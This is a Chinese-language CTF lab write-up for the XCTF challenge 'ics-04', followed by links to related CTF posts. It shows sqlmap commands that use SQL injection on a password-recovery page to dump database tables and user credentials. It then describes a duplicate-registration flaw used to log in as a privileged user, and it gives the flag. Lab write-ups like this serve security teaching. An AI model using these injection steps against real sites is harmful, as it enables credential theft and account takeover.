CTF ics-04

news/2024/10/17 20:29:29/

难度系数: ★★★★
题目来源: XCTF 4th-CyberEarth
题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。
题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样)

1、点击链接进入如下界面

在这里插入图片描述
2、先注册几个账号,相同的用户名

在这里插入图片描述3、登录—>忘记密码

在这里插入图片描述

4、忘记密码

在这里插入图片描述

5、在kail Linux 里,开始sql注入

执行如下:

5.1

sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" ‐dbs

在这里插入图片描述

5.2

sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 - -tables

在这里插入图片描述
5.3

sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user - -columns

在这里插入图片描述

5.4

sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004  -T user -C "username,password" - -dump

在这里插入图片描述

5.5 OK

在这里插入图片描述

有一个没注册过的用户名:c3tlwDmIn23

在这里插入图片描述
其密码经过 md5 加密处理过,但这个用户的密码没有被解析出来。

6、看到有两个用户名为 yibodong,并且题目描述中说了注册页面有漏洞,再重复注册一个 c3tlwDmIn23 用户

在这里插入图片描述

7、登录—>flag就出来了

在这里插入图片描述

8、OK

cyberpeace{f3f54fb8f17053c68a7672794dae7e98}


http://www.ppmy.cn/news/462051.html

相关文章

CTF 学习笔记

文章目录 一,CTF(Capture The Flag)1 CTF简介2 CTF赛事2.1 国家赛事2.2 国内赛事 3 CTF意义4 CTF学习4.1 竞赛模式4.2 题目类型4.3 学习建议 二,CTF题目案例三,CTF靶机实战一步步拿下WordPres1 实验环境1.1 WordPress简…

CTF supersqli

题目来源: 强网杯 2019 题目描述: 随便注 题目场景: http://220.249.52.133:31334 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、‘1’—>提交 3、使用union select 爆字段 …

CTF easycap Banmabanma

文章目录 一、easycap二、Banmabanma 一、easycap 难度系数: ★★ 题目来源: bsidessf-ctf-2017 题目描述: 你能从截取的数据包中得到flag吗? 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/1…

CTF Broadcast

题目来源: 2019_Redhat 题目描述: 粗心的Alice在制作密码的时候,把明文留下来,聪明的你能快速找出来吗? 题目附件: 附件1 1、 附件1 2、解压后 3、选中“task.py”—>打开 4、可直接找到flag #!/…

CTF mysql

难度系数: ★★★★★ 题目来源: XCTF 题目描述: 我们在Mysql数据库中存放了flag,但是黑客已经把它删除了。你能找回来flag吗? 题目场景: 暂无 题目附件: 附件1 1、附件1 链接:htt…

CTFHub Linux 动态加载器

查看环境 先给了755 他自己传了flag 等于告诉我们在哪了 然后限到了644 不想让我们直接看 都到这一题了权限应该不用讲了 提示给了shell 且不需要提权 于是需要新学一个东西 动态加载 Linux ELF Dynaamic Loader elf文件 elf文件是linux下的可执行文件 文件头为elf 不知道…

CTFHub Linux 动态加载

CTFHub Linux 动态加载 观察页面,写着没有 x权限,说明我们没有办法执行根目录下的 elf 文件 readflag,所以我们无法利用下方的 webshell 获取flag(我们的权限不够) 我们发现无法访问到 flag Linux 下 x(eXecute,执行)…

程序加载是什么

程序加载是什么? 解答:http://www.yayihouse.com/yayishuwu/chapter/1175